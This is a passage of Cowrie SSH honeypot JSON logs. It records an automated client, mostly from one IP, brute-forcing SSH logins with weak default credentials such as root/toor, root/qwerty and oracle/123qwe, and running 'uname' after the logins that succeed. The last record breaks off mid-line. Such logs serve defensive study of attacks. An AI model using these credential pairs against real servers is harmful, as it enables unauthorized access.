{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:50:07.332665Z","src_ip":"45.125.211.194","session":"b2adede6864a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:50:07.519901Z","src_ip":"45.125.211.194","session":"b2adede6864a"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:50:08.400421Z","src_ip":"45.125.211.194","session":"b2adede6864a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:50:08.939696Z","src_ip":"45.125.211.194","session":"b2adede6864a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:50:08.940623Z","src_ip":"45.125.211.194","session":"b2adede6864a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:50:09.162455Z","src_ip":"45.125.211.194","session":"b2adede6864a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:50:09.163815Z","src_ip":"45.125.211.194","session":"b2adede6864a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":48395,"dst_ip":"1.2.3.4","dst_port":22,"session":"e28b176e5f6b","protocol":"ssh","message":"New connection: 45.125.211.194:48395 (1.2.3.4:22) [session: e28b176e5f6b]","sensor":"my-vps","timestamp":"2025-08-28T03:50:22.201836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:50:22.229027Z","src_ip":"45.125.211.194","session":"e28b176e5f6b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:50:22.414511Z","src_ip":"45.125.211.194","session":"e28b176e5f6b"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:50:23.239630Z","src_ip":"45.125.211.194","session":"e28b176e5f6b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:50:24.449769Z","src_ip":"45.125.211.194","session":"e28b176e5f6b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":37070,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2417d5aa357","protocol":"ssh","message":"New connection: 45.125.211.194:37070 (1.2.3.4:22) [session: b2417d5aa357]","sensor":"my-vps","timestamp":"2025-08-28T03:50:36.865489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:50:36.893995Z","src_ip":"45.125.211.194","session":"b2417d5aa357"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:50:37.080956Z","src_ip":"45.125.211.194","session":"b2417d5aa357"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:50:37.923629Z","src_ip":"45.125.211.194","session":"b2417d5aa357"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:50:39.135599Z","src_ip":"45.125.211.194","session":"b2417d5aa357"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":32775,"dst_ip":"1.2.3.4","dst_port":22,"session":"43f935f1a9d7","protocol":"ssh","message":"New connection: 45.125.211.194:32775 (1.2.3.4:22) [session: 43f935f1a9d7]","sensor":"my-vps","timestamp":"2025-08-28T03:50:51.693863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:50:51.707604Z","src_ip":"45.125.211.194","session":"43f935f1a9d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:50:51.913598Z","src_ip":"45.125.211.194","session":"43f935f1a9d7"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:50:52.742168Z","src_ip":"45.125.211.194","session":"43f935f1a9d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:50:53.247493Z","src_ip":"45.125.211.194","session":"43f935f1a9d7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:50:53.248166Z","src_ip":"45.125.211.194","session":"43f935f1a9d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:50:53.462383Z","src_ip":"45.125.211.194","session":"43f935f1a9d7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:50:53.463454Z","src_ip":"45.125.211.194","session":"43f935f1a9d7"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":53748,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2e308ec3458","protocol":"ssh","message":"New connection: 45.125.211.194:53748 (1.2.3.4:22) [session: d2e308ec3458]","sensor":"my-vps","timestamp":"2025-08-28T03:51:06.523321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:51:06.524420Z","src_ip":"45.125.211.194","session":"d2e308ec3458"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:51:06.739799Z","src_ip":"45.125.211.194","session":"d2e308ec3458"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:51:07.366223Z","src_ip":"45.125.211.194","session":"d2e308ec3458"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:51:07.860950Z","src_ip":"45.125.211.194","session":"d2e308ec3458"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:51:07.861603Z","src_ip":"45.125.211.194","session":"d2e308ec3458"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:51:08.135771Z","src_ip":"45.125.211.194","session":"d2e308ec3458"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:51:08.137108Z","src_ip":"45.125.211.194","session":"d2e308ec3458"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":53317,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f6b10d2e52a","protocol":"ssh","message":"New connection: 45.125.211.194:53317 (1.2.3.4:22) [session: 0f6b10d2e52a]","sensor":"my-vps","timestamp":"2025-08-28T03:51:21.307899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:51:21.341313Z","src_ip":"45.125.211.194","session":"0f6b10d2e52a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:51:21.525691Z","src_ip":"45.125.211.194","session":"0f6b10d2e52a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T03:51:22.357103Z","src_ip":"45.125.211.194","session":"0f6b10d2e52a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:51:23.568334Z","src_ip":"45.125.211.194","session":"0f6b10d2e52a"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":42598,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4807eafbbd5","protocol":"ssh","message":"New connection: 194.233.79.134:42598 (1.2.3.4:22) [session: d4807eafbbd5]","sensor":"my-vps","timestamp":"2025-08-28T03:51:34.730253Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":8768,"dst_ip":"1.2.3.4","dst_port":22,"session":"25aca844a8a2","protocol":"ssh","message":"New connection: 45.125.211.194:8768 (1.2.3.4:22) [session: 25aca844a8a2]","sensor":"my-vps","timestamp":"2025-08-28T03:51:36.072216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:51:36.088977Z","src_ip":"45.125.211.194","session":"25aca844a8a2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:51:36.103837Z","src_ip":"194.233.79.134","session":"d4807eafbbd5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:51:36.282499Z","src_ip":"45.125.211.194","session":"25aca844a8a2"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-28T03:51:37.120057Z","src_ip":"45.125.211.194","session":"25aca844a8a2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:51:38.332274Z","src_ip":"45.125.211.194","session":"25aca844a8a2"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":42322,"dst_ip":"1.2.3.4","dst_port":22,"session":"67f6ff4839c2","protocol":"ssh","message":"New connection: 45.125.211.194:42322 (1.2.3.4:22) [session: 67f6ff4839c2]","sensor":"my-vps","timestamp":"2025-08-28T03:51:50.963019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:51:50.973384Z","src_ip":"45.125.211.194","session":"67f6ff4839c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:51:51.178181Z","src_ip":"45.125.211.194","session":"67f6ff4839c2"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:51:52.001410Z","src_ip":"45.125.211.194","session":"67f6ff4839c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:51:52.434534Z","src_ip":"45.125.211.194","session":"67f6ff4839c2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:51:52.435304Z","src_ip":"45.125.211.194","session":"67f6ff4839c2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:51:52.643886Z","src_ip":"45.125.211.194","session":"67f6ff4839c2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:51:52.645128Z","src_ip":"45.125.211.194","session":"67f6ff4839c2"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":34166,"dst_ip":"1.2.3.4","dst_port":22,"session":"164822040e1f","protocol":"ssh","message":"New connection: 45.125.211.194:34166 (1.2.3.4:22) [session: 164822040e1f]","sensor":"my-vps","timestamp":"2025-08-28T03:52:05.773535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:52:05.788645Z","src_ip":"45.125.211.194","session":"164822040e1f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.